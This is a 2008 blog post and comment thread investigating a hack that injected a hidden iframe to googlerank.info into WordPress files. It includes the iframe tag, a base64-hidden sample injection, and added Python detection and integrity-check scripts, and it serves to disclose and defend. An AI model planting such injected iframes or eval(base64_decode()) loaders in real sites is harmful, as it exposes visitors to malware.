WordPress hacked: googlerank.info

Written by Verne on March 6th, 2008

It came to my attention in the last few days that a handful of people had been experiencing errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins was causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.

Before I begin describing the issue, I want to state that I do not have a permanent fix (though I do have a temporary one). The purpose of this post is to document my findings for anybody who has experienced the symptoms or is interested in helping me find and fix the underlying issue. I’ve found very little documentation on this problem thus far, so I’m hoping to provide some clarity to all others who may be searching for it.

Overview

A hidden <iframe> that points to googlerank.info has been found embedded into a handful of files that are associated with a WordPress installation. The <iframe> always appears at the very bottom of the source code, just before the </body> tag. It is possible that WordPress presents a vulnerability that allows an unauthorized user to access and alter files, thereby compromising the security of the site owner as well as the site’s visitors.

Symptoms

Here are some of the symptoms to look out for:

  • Your site loads for an instant, and quickly redirects to a 404 Page Not Found error page.
  • While your site is loading, your status bar may read “Waiting for http://googlerank.info/…”.
  • Viewing your site on older browsers crashes the browser. This has been mostly reported by users on IE6.
  • Your anti-virus software may detect suspicious activity from your site.

I have not personally experienced the last 2 symptoms, so I unfortunately can’t provide any more details on them. If you’ve experienced any of these symptoms and are able to provide a screenshot or a copy of the error message, please contact me or leave a comment on this post.

Please also note that some of these symptoms occur inconsistently and only for a handful of visitors. I’ve encountered these problems no more than 2 or 3 times myself, but have heard about it enough times from visitors that it concerns me.

Issue

When I first set out to figure out why this site was bringing up errors, the first place I looked was the generated source code (right click > View Source). I slowly went through the syntax line-by-line to see if anything was out of place and discovered this little nugget at the very bottom, right before the </body> tag:

<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>

How odd: an embedded hidden <iframe> that was loading a mysterious website called googlerank.info. Diving deeper into the investigation, I discovered that the same line of code was appearing in my WordPress Site Admin as well. As I continued to dig through the files on my server, I found that there were a handful of other files that had somehow been altered to include the same bit of code.

Here is a complete list of files that the above code appeared in:

  • /wp-admin/admin-footer.php
  • /wp-admin/upload.php
  • /wp-content/themes/yourtheme/footer.php
  • /wp-includes/js/tinymce/blank.htm
  • /wp-includes/js/tinymce/license.htm
  • /wp-includes/js/tinymce/plugins/paste/blank.htm
  • /wp-includes/js/tinymce/plugins/paste/pastetext.htm
  • /wp-includes/js/tinymce/plugins/paste/pasteworld.htm
  • /wp-includes/js/tinymce/themes/advanced/about.htm
  • /wp-includes/js/tinymce/themes/advanced/anchor.htm
  • /wp-includes/js/tinymce/themes/advanced/charmap.htm
  • /wp-includes/js/tinymce/themes/advanced/color_picker.htm
  • /wp-includes/js/tinymce/themes/advanced/image.htm
  • /wp-includes/js/tinymce/themes/advanced/link.htm
  • /wp-includes/js/tinymce/themes/advanced/source_editor.htm

There are likely more, but those are the ones I found after searching for nearly an hour.

googlerank.info

If you visit googlerank.info, you will find an imitation Google error page that says the following:

The requested URL /counter was not found on this server.

The page looks like this:

[Screenshot: the googlerank.info imitation Google error page]

However, from time to time, the site won’t load, and instead you will see this:

[Screenshot: Firefox “Problem loading page” error for googlerank.info]

Note that Firefox reports that it couldn’t “establish a connection to the server at medicasntred.com”. The URL of the page is also no longer googlerank.info, and instead reads ‘http://medicasntred.com/check/upd.php?t=563’ (it is NOT suggested that you visit this URL). The Whois record for medicasntred.com can be found here.

Research

Doing a quick Google search on the issue returns very few WordPress-related results. However, it seems as though many other open source platforms have been compromised in the same fashion.

Searching the WordPress Support Forums, however, turns up the following thread about WordPress 2.2.2 being hacked. In this thread, snorkelman describes symptoms very similar to those I’ve described above. He even offers a hypothesis for what was causing the issue:

The get_header() and get_footer() functions in general_template.php were modified. get_header() created a cookie called “yahg”, and get_footer() looked for it. If it found it, it sucked in some code from googlerank.info. The actual line it inserted was hidden by being base64 encoded, but it showed up on the site looking like this:

<iframe src=http://googlerank.info/counter style=display:none>

At the time of posting, snorkelman was running WordPress 2.2.2, which was known to be vulnerable and which prompted the WordPress folks to release a critical security update to version 2.3.3. The issue was shrugged off as having been caused by 2.2.2’s vulnerability and the topic was put to rest.

I’ve since resurfaced the thread by posting my situation in hopes that it will alert people that this hack seems to still be active in version 2.3.3.

Findings

From my research and exploration, here are a few things I’ve figured out about this problem:

  • The vulnerability that the hack takes advantage of may have existed in the last few versions of WordPress, as I found the code lingering in /wp-includes/js/tinymce/license.htm, which I believe no longer ships with WordPress (it has been replaced by license.txt). However, it could also simply be that the file was left over from a past version and was only altered recently.
  • The files were modified within the past 3 weeks, as that’s when I last uploaded the footer.php of this theme (as you’ll read below, re-uploading clean files gets rid of the unwanted code). Since I upgraded to 2.3.3 when it was first released, more than 3 weeks ago, the tampering happened while 2.3.3 was installed rather than being carried forward from 2.2.2. Note that this dates the write, not the entry point: a leaked FTP or admin password, a vulnerable plugin or a compromised host would leave the same trace, so on its own it does not prove that the hole is in WordPress 2.3.3.
  • The hack seems to target primarily .htm and .php files that have </body> in them. This is where the code is usually inserted.
  • In response to snorkelman’s hypothesis above, I haven’t found anything in the get_header() function that creates a cookie named “yahg” and that passes it on to the get_footer() function, though that is a scary thought.
  • I cleaned up my files yesterday and the code has not returned thus far. This is good news as it suggests that the code is not self-regenerating.

Solution

As noted at the beginning of this post, I don’t have a permanent fix for this issue. I believe the source of the solution exists within the WordPress code structure itself, which I haven’t looked extensively enough at to be able to diagnose. I do however have a temporary fix, which doesn’t guarantee that the issue will not resurface.

Find out if you’re a victim

First, see if you or your visitors have been experiencing any of the symptoms described above. Next, check the source code of your WordPress site (both the front-end and the back-end/site admin) to see if there is a hidden <iframe> embedded right before your </body> tag. If you see it there, then it’s likely that a number of other files have also been tampered with.
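A file-level version of that check, added here as an example and not part of the original post: it walks a WordPress directory, flags any <iframe> that points at the hosts named on this page or that carries the width=1/height=1/display:none hiding attributes, and also decodes long base64 strings and looks for the same tag inside them, which is the hiding technique snorkelman describes. The .php/.htm extension filter, the file list and the two hosts come from the post; the eval(base64_decode()) check, the 40-character blob threshold and the sample files that demo_scan() writes to a temporary directory are assumptions made for this example.

```python
import base64
import os
import re
import shutil
import tempfile
from typing import Dict, List

# Extensions the post reports as targets: .php and .htm files that contain </body>.
SCAN_EXTENSIONS = (".php", ".htm", ".html")

# Hosts named on the page (the iframe target and the redirect Firefox ended up on).
SUSPECT_HOSTS = {"googlerank.info", "medicasntred.com"}

# Matches the opening tag in both forms quoted on the page, e.g.
#   <iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
#   <iframe src=http://googlerank.info/counter style=display:none>
IFRAME_RE = re.compile(r"<iframe\b(?P<attrs>[^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?\s*(?:https?:)?//(?P<host>[^\s"'/>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"""display\s*:\s*none|\b(?:width|height)\s*=\s*["']?[01](?!\d)""", re.IGNORECASE)

# Assumed heuristics for the base64-hidden variant from the forum thread: any run of
# base64 characters long enough to hold the tag is decoded and re-checked, and an
# eval(base64_decode(...)) call in a PHP file is reported on its own.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def inspect_text(text: str) -> List[str]:
    """Return the reasons a file body looks tampered with; an empty list means clean."""
    reasons: List[str] = []
    for tag in IFRAME_RE.finditer(text):
        attrs = tag.group("attrs")
        src = SRC_RE.search(attrs)
        host = src.group("host").lower() if src else "(no src)"
        if host in SUSPECT_HOSTS:
            reasons.append(f"iframe to known-bad host {host}")
        elif HIDDEN_RE.search(attrs):
            reasons.append(f"hidden iframe to {host}")
    if EVAL_B64_RE.search(text):
        reasons.append("eval(base64_decode(...)) in PHP")
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # not valid base64 (binascii.Error is a ValueError)
            continue
        if IFRAME_RE.search(decoded) or any(h in decoded.lower() for h in SUSPECT_HOSTS):
            reasons.append("base64 blob decodes to iframe/suspect host")
            break
    return reasons


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a WordPress install; map relative path -> reasons for every suspect file."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                reasons = inspect_text(fh.read())
            if reasons:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return hits


def demo_scan() -> Dict[str, List[str]]:
    """Write a constructed mini WordPress tree to a temp dir, scan it and clean up."""
    payload = b"echo '<iframe src=http://googlerank.info/counter style=display:none></iframe>';"
    blob = base64.b64encode(payload).decode("ascii")
    samples = {
        # tampered theme footer, exactly the tag the post found
        "wp-content/themes/yourtheme/footer.php":
            "</div>\n<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>\n</body>\n</html>\n",
        # base64-hidden, cookie-gated variant (constructed, following the forum description)
        "wp-includes/general-template.php":
            "<?php\nfunction get_footer() {\n  if (isset($_COOKIE['yahg'])) { eval(base64_decode('" + blob + "')); }\n}\n",
        # clean file with a legitimate, visible iframe
        "index.php":
            '<html><body><iframe src="http://pagead2.googlesyndication.com/ad" width=300 height=250></iframe></body></html>\n',
        # clean TinyMCE file
        "wp-includes/js/tinymce/blank.htm": "<html><body></body></html>\n",
        # wrong extension, never scanned
        "readme.txt": "<iframe src=http://googlerank.info></iframe>\n",
    }
    root = tempfile.mkdtemp(prefix="wp-scan-")
    try:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo_scan()
    for rel, reasons in sorted(results.items()):
        print(f"{rel}: {'; '.join(reasons)}")
```

Run it as `python scan.py /path/to/wordpress` on a copy of the server files; with no argument it scans the constructed sample tree, where the theme footer and the base64-hidden PHP variant are reported and the visible ad iframe is not. A hit on a core file tells you which files to overwrite; a hit on a theme or plugin file tells you the problem is outside /wp-admin/ and /wp-includes/, where the re-upload steps below do not reach.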

Update your files

The temporary solution to this issue is to simply overwrite the server’s files with your clean files. Follow these steps:

  1. Re-upload your theme’s footer.php file to your theme folder. Make sure that the footer.php file you have doesn’t have the line of code in it (in case you might have downloaded it from the server before).
  2. If you are editing your theme files from the WordPress site admin, go to your Theme Editor (Presentation > Theme Editor) and click on Footer on the right-hand side. Scroll to the bottom of the file and delete the following line of code:
    <iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
  3. Download the latest version of WordPress from here.
  4. Copy the /wp-admin/ and /wp-includes/ folders into your server and overwrite the existing files. This replaces every core file with a clean copy, but it does not remove files that exist only on the server (leftovers from older versions such as the license.htm mentioned above, or anything an attacker dropped), and it does not touch /wp-content/, your posts in the database or your passwords. Check those separately, and change every password (WordPress, FTP, database) once the files are clean.
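To verify that the overwrite actually left you with clean core directories, and to see what it cannot fix, here is an added example (not from the original post) that hashes every file under wp-admin/ and wp-includes/ in a fresh WordPress download and in the live install and reports three lists: files whose content differs (tampered or outdated), files present only on the server (leftovers like the license.htm mentioned above, or anything an attacker dropped; re-uploading never deletes these) and files missing from the server. The two directory names are the ones the post's step 4 overwrites; the sample trees that demo_compare() builds in a temporary directory are constructed for the example.

```python
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List

# The directories the post's step 4 overwrites. wp-content/ and wp-config.php are
# site-specific and have no counterpart in a fresh download, so they are not compared.
CORE_DIRS = ("wp-admin", "wp-includes")


def _digest(path: str) -> str:
    """SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_core(root: str) -> Dict[str, str]:
    """Map 'wp-admin/...' style relative paths to digests for every file under CORE_DIRS."""
    digests: Dict[str, str] = {}
    for core in CORE_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, core)):
            for name in files:
                path = os.path.join(dirpath, name)
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                digests[rel] = _digest(path)
    return digests


def compare_trees(clean_root: str, live_root: str) -> Dict[str, List[str]]:
    """Compare a fresh download (clean_root) against the live install (live_root)."""
    clean = hash_core(clean_root)
    live = hash_core(live_root)
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "extra": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def _write(root: str, rel: str, body: str) -> None:
    """Create rel under root (and any parent directories) with the given text."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)


def demo_compare() -> Dict[str, List[str]]:
    """Build a constructed clean tree and a constructed live tree, compare them, clean up."""
    footer = "<?php /* admin footer */ ?>\n</body>\n</html>\n"
    injected = footer.replace(
        "</body>",
        "<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>\n</body>")
    work = tempfile.mkdtemp(prefix="wp-verify-")
    try:
        clean, live = os.path.join(work, "clean"), os.path.join(work, "live")
        # the fresh download
        _write(clean, "wp-admin/admin-footer.php", footer)
        _write(clean, "wp-includes/js/tinymce/blank.htm", "<html><body></body></html>\n")
        _write(clean, "wp-includes/version.php", "<?php $wp_version = '2.3.3';\n")
        # the live server: injected footer, an untouched file, a leftover from an older
        # version that an overwrite will not remove, and one core file gone entirely
        _write(live, "wp-admin/admin-footer.php", injected)
        _write(live, "wp-includes/js/tinymce/blank.htm", "<html><body></body></html>\n")
        _write(live, "wp-includes/js/tinymce/license.htm", "<html><body>old license</body></html>\n")
        _write(live, "wp-content/themes/yourtheme/footer.php", injected)  # outside CORE_DIRS, not reported
        return compare_trees(clean, live)
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    import sys
    report = compare_trees(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else demo_compare()
    for kind in ("modified", "extra", "missing"):
        for rel in report[kind]:
            print(f"{kind:8} {rel}")
```

Usage: unpack the download you fetched in step 3 next to a copy of the server files and run `python verify.py ./wordpress-clean ./wordpress-live`. An empty "modified" list after the re-upload confirms step 4 took; anything in "extra" has to be deleted by hand, because copying files over the top never removes it. Files outside wp-admin/ and wp-includes/ (your theme's footer.php included) are deliberately not compared, since the download has nothing to compare them against.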

Closing Words

I wrote this post in hopes of bringing some necessary attention to this issue. I’m fairly confident that I’m not the only one who has been affected by this. In fact, I’m pretty sure that many people who have been affected aren’t aware that their site has been compromised.

If you own a WordPress site yourself, I encourage you to do a quick check to make sure you’re clean. If you know others who own WordPress sites, please pass this on to them. If you own a site that has the ability to communicate to a broad audience that this issue may be relevant to, I encourage you to spread the word by writing about this or linking to this post.

Let’s hope we get to the bottom of this and can get a permanent fix in the next version of WordPress!

Update

After some follow-up reading, I found the following article on another individual’s experience with WordPress being hacked. The post was written in November 2007, so the author was definitely using a version of WordPress that preceded 2.3.3. The description of the issue is actually very similar to what snorkelman had described in the WordPress forums (see above). Perhaps my case is an evolution of the same hack or possibly the result of only half of the hack working.

I’ll keep posting updates as I uncover more. Thanks to those who have begun spreading the word already.

53 Responses

  • Mike Robinson

    Thanks for the heads up. I don’t seem to have been affected by this but I’ll keep watch on all my WordPress powered sites just in case. Excellent job bringing this all together :)

  • Satish

    Wow, wtf is up with that?

  • adii

    WP 2.3.3 at risk?…

    Verne over at Creative Briefing just dropped me an e-mail to inform me of a vulnerability / potential security flaw he stumbled on in WP 2.3.3… I haven’t noticed anything about this before, but read his documented findings here and check wh…

  • Wp Wordpress » Blog Archive » WP 2.3.3 at risk?

    [...] flaw he stumbled on in WP 2.3.3… I haven’t noticed anything about this before, but read his documented findings here and check whether your blog is being [...]

  • Armen

    This is one thing which bothers me about WordPress; its vulnerability. I know nothing about developing a CMS or blogging engine, but Textpattern and Expression Engine seem to have a lot less issues and updates than WordPress.

    However, I’ve never had any problems myself, so I still love it!

  • Ozh

    Armen: the only way for a software not to have vulnerabilities is not to have features. Sure, the popularity of WP brings it to the attention of hackers who find exploits, but the responsive community of unofficial & official coders reacts pretty quick to fix those holes.
    It’s pretty likely that TXP or EE do have vulnerabilities. Not hearing about them is more scary than knowing about those being fixed in WP, in my opinion.

  • Chad

    This is interesting, I was getting visitors telling me that I have a virus on my page(a trojan)

    This was with AVG.. I simply did a quick wordpress update and the file seemed to be ok, a few days later someone sent me a screenshot of McAfee finding the same problem, I run on a mac so I don’t see it, and I can’t seem to find this error. I have a few plug-ins but I don’t think they are the problem.

    I really have absolutely no idea where to start looking, I don’t have any of the iFrames that you spoke about, so I am not sure but thanks for the post its something to think about.

  • Verne

    @ Armen & Ozh – It’s true that not hearing about vulnerabilities can almost be scarier than hearing about them. At least when we know about them we can act to fix them! Also, you’ll usually find that more popular and more widely distributed platforms are the ones that are most targeted by hackers. Who wants to target something that nobody uses anyway (not to say nobody uses TXP or EE)?

    @ Chad – I just did a quick check of your site and my Firefox web developer toolbar is picking up a number of different iframes running (though you could be aware of this). 1 for your actual site, 2 by googlesyndication.com and 2 by pc-futter.com. If you want to shoot me an email maybe I can help you debug it.

  • WPCandy » WordPress 2.3.3 Vulnerabilities?

    [...] If you have been having problems like Verne, he’s posted an article on his blog for a temporary fix to solve this. If you’re interested, check it out here. [...]

  • Ryan

    Thanks for the heads up :)

  • Armen

    Ozh & Verne – Good point. But maybe the fact that WordPress is still structured around PHP4 doesn’t help?

  • milo

    You might block browser access to your wp directory via a .htaccess file.

    Try accessing this folder via the browser :
    address.com/wp-content/plugins/
    to see what I mean.

  • How To: Preparing for WordPress Upgrades

    [...] WordPress 2.5 is due to be released this Monday.   This comes on the heels of a possible vulnerability found with WordPress 2.3.  So, what do you need to do to prepare for a major WordPress [...]

  • Wp Wordpress » Blog Archive » How To: Preparing for WordPress Upgrades

    [...] WordPress 2.5 is due to be released this Monday.   This comes on the heels of a possible vulnerability found with WordPress 2.3.  So, what do you need to do to prepare for a major WordPress [...]

  • Simon

    Hi Verne. Just out of interest, have you contacted your web host? Apart from the fact that it may be in your terms of service to let them know of any malicious activity, it might also help you completely rule out some sort of server hack as opposed to a wordpress hack. Check the FTP access logs for example.

    Apart from that, you may want to try blocking browser access via .htaccess (as suggested above) and/or setting up an automated check to verify the files at regular intervals (write a PHP script to check the sizes of files and compare them to a fresh download, you could cron it and get it to email you if there are any discrepancies). Not fool proof but would catch a fairly simple code injection hack like this.

    As a matter of course you may also want to check any plugins you have installed for known vulnerabilities/updates.

    Good luck, we all feel for you.

  • Flaw discovered in Wordpress 2.3.3 | Le Journal du Blog

    [...] from Creative Breafing has just discovered the first flaw in the latest version of WordPress (2.3.3) It came to my [...]

  • Shanx

    I don’t see any iframes in my WP install, nor on my websites. This problem is associated with either older WP installs that were updated and did not delete some older files that lingered (I started my installs with 2.3.3 svn) or the offending code is a result of some needless plugin or something. The first thing WP noobs should be advised NOT to do is to install plugins for piddly little purposes that are easily handled by a more intelligent php code tweak in their theme.

  • Verne

    @ milo – Thanks for the heads up! I’ve made the adjustments so the directories can’t be viewed.

    @ Simon – I’ve already contacted my host and tried to get the FTP logs. Just waiting on their response back. However, I’m somewhat doubtful that it was a server hack rather than a WordPress hack as I’ve heard about googlerank.info appear in previous WP hack attempts as well. Then again, maybe those cases were victims of server hacks as well. I’ll look into it either way. Thanks for your 2 cents!

    @ Shanx – I think you make a good point about previous files lingering that open up the vulnerabilities of WP. I think I’ll do a fresh update when 2.5 comes out. I have already in the meantime deactivated the majority of the useless plugins on this site and am only running the more trusted ones.

    Thank you to everyone who has helped to share the story thus far, and I’m happy to hear that nobody has been experiencing the same exploits. I’m also glad to hear that 2.5 is due out very shortly (in the next few days perhaps?), so hopefully we can put all these vulnerabilities behind us for at least another short while.

  • milo

    Well, more flaws: your register function is open, some vulnerabilities through the register function were discovered in the past, you may have the hacker sitting in your user panel.

    Looks like you were not very successful with closing all doors, e.g. your readme file is still accessible.

    Blaming a software without securing the entire server and its redundant files might not be the right way.

  • Verne

    Hi milo – I’m not looking to place blame on anything/anyone so much as I’m looking for ways to fix the issue and help others avoid it. Your suggestions are really helpful and I’ll definitely look further into making sure all my loose ends are tied up. Thanks again for your help.

  • Nick

    I visited your site before and it set something off in my Norton, unfortunately I just bounced real quick and didn’t come back. Then i clicked on a link on another site and it landed me back at your site, and as I was reading I realized that it was the same place. Too bad I’m running a new computer that just had the 60 day Norton on it and it ran out four days ago. My new anti-virus didn’t find anything… If anyone has Norton, they are probably the people to find for this. I’m sure if mine detected it, someone elses will.

  • Nick

    Apparently you are aware of my previous finding, i posted it on Adii’s site… http://www.adii.co.za/2008/02/28/working-at-home-make-it-more-interesting/

    you replied to my comment so I guess you know what i was talking about..

  • Verne

    Hi Nick, your comment was actually the initial one that had set me off to explore what was going on with the site. I’ve since been able to identify the problem and fix it, and I haven’t heard of any other issues thus far.

    Thanks for giving the site another chance! Hopefully without the virus alerts it will be a little more welcoming from now on. :)

  • Nick

    Lol. I didn’t mean to give it another chance.. I was scared of your site! Just kidding, I knew it had to be something weird, but when the sirens go off, you normally jump. I can’t wait for the new version… Now I’m skeptical of everyone, I got 2 emails today asking if my site was a ‘website or is it wordpress’. It’s probably nothing, but you never know. You’re better off taking off all the logos and not letting people register…

  • Verne

    Well I’m happy you found your way back here, even if it was accidental! :) I probably would have been scared too, haha.

    I’m thinking of switching the MyAvatars plugin over to the Gravatars one instead, MyAvatars is too buggy for my liking. And I’ve already disabled registration to minimize the risks.

    WP 2.5 promises great things, so hopefully we can forget all this WP virus crazy talk soon!

  • Tom

    i still use WP 2.2.2. should i be worried?

  • Ward Web Werks» Blog Archive » WordPress hacked: googlerank.info

    [...] browser crash completely. One individual even reported that their anti-virus software had thrown a Read More This entry was written by admin and posted on March 10, 2008 at 2:33 pm and filed under [...]

  • New attacks on blogs - Page 2 - Forum Per Webmaster - Tutti Per Uno

    [...] doing injection through an iframe, both in posts and in comments. Among others, you’ll find info here. For anyone who wants to know whether the flaw has been exploited on their own blog, just run an SQL query with [...]

  • Order of the Bath » Blog Archive » I wuz hacked

    [...] 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). [...]

  • Rick

    Hi Verne, thanks for the link back to my article (curiously it didn’t trackback, I found out by looking at my referrer stats)

    Your new finding bothers me as I really believed I had cracked it by updating WP. I was well behind at the time and now I keep up with every minor release. What is more worrying is that I have no confidence that 2.5 will fix it. If they don’t know about the problem in 2.3.3. then no effort will have been made to correct it in 2.5.

    Also worth noting is that not only was my blog hacked – this is in the /blog/ subdirectory of my site – but my main index.html page on the root was also modified. This suggests that whatever got in had a good hunt around. It smells of something more fundamental than a simple WP hack, especially if other systems are affected as well. Maybe one of the PHP-admin vulnerabilities that has been going around.

  • Wordpress footer template hacked badly… : Alec Tang - A Developer’s Random Blog

    [...] your WordPress Installation Compromised? Al Gore’s is. WordPress hacked: googlerank.info Are Hackers Exploiting WordPress [...]

  • On Blogging Australia » Blogging tips Current Feature » WordPress 2.3 is falling to bits

    [...] creative briefing has a very thorough post on a related vulnerability (it may be a different ‘exploit’ or means of exploiting the exact same vulnerability that uses a hidden iframe) – if you are at all concerned, I suggest you read it. Tagged as: Exploit, link injection, Security, Vulnerability, WordPress [...]

  • Basic Thinking Blog | Blogvirus

    [...] the site was simply hacked, hence the warning message. The explanation of the hack can be found at creativebriefing. It is a link, embedded inside an iframe, to a dubious [...]

  • Basic Thinking Blog | Blogvirus = hacked II

    [...] 5. And background information on the infection via WordPress at Creative Briefing [...]

  • erdfisch blog

    WordPress infects Windows computers…

    Germany’s flagship alpha blogger Robert Basic had a black day yesterday. His WordPress-powered blog was infected through a security hole and spread a virus that could infect Windows computers.

  • soutie

    I encountered a similar problem with my site. Visitors to the site with AVG antivirus indicated that they received a warning about a virus “JS/PSYME.QM”. I investigated this and found it to be related to a redirectional script.
    Visitors with Bit Defender AV reported a trojan in my IE temp files.
    I found out that this was caused by a malicious JavaScript embedded in the source code of my main index page.

    I began looking at every script tag on my index page and found a script with some IFRAME relatity — I deleted it and updated wordpress to 2.5.1……
    I hope that this works since it has only been one day since —- but it is functioning at this time.

  • koma

    avg, kaspersky and mcafee tell me there is a virus on my page. I just don’t know where to check. I disabled all plugins, erased all sidebars and still got those warnings. help me please

    many 10x

  • milo

    Backup your sql database completely via phpmyadmin or
    the export feature via wp admin,
    then copy your wp-config file (download it to your HD),
    then erase EVERYTHING in the wp folder, everything!
    might be a compromised file there
    then install the latest wp version with your config file
    then import your sql via phpmyadmin
    or via the wp admin import file

    voila, you have a clean site again.

  • Rick

    … and then change all your passwords as well. Everyone’s.

  • Upgrade Complete, and hopefully now safe from the hacker

    [...] info here and here. On this site it took the form of links added into the template files, and with a display: none; [...]

  • Niyaz

    Well New Versions of WP are out now with more security .. Like People Say until there is the software.. hackers will be too :D

  • FMS GROUP

    Thanks for the heads up :)

  • Rich B

    The bug may have reared its ugly head again. Was at a site this morning, no problems, just returned to it and my AVG cut me off with the message of Virus name JS/Psyme.QM as a trojan so someone may have re-introduced it or else upgraded it to get in to the current version of WordPress.

  • iCarly cds

    Crazy what wordpress has evolved into

  • Katalogs

    This is interesting

  • John

    I’m running 2.7.2 and AVG just flagged my site. I checked the source and found an iframe. But it wasn’t from tinymce. It was embedded right into my post :S I’ve since updated the post and it seems to be clear. Still a bit worried though.

  • Rick

    Are you sure you haven’t got a hacked copy of WordPress? The latest legitimate version is only 2.7.1.

    But anyway, there are a lot of other ways into web hosting sites now – exploits of PHP, Apache and other stuff so I would check all of those as well.

  • John

    Sorry, I meant 2.7.1.What bothers me is that I had upgraded to the new version recently and only then made the last post (which was one of two that were infected). The second post was made with an older version. Just like before, it was embedded right into the post. Not much info available on this for the new version. Your post was on top when I googled, only noticed the post was old when I started reading.

  • Kevin S

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specific hack code is:

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    * Gauge how often it’s happening
    * Share solutions
    * Expose the culprits, if possible
    * Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advice, and I plan to sweep my machine and those of other team members with FTP access (could be a virus attached to our systems), check recent plugins, scan for viruses on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do the same.

    For permanent solution read more @ http://annanta.com/?p=338

  • zac

    This happened to one of my sites and it was running 2.9 if not 3! An upgrade to 3.0.1 seems to have cleared it out.

Leave a Reply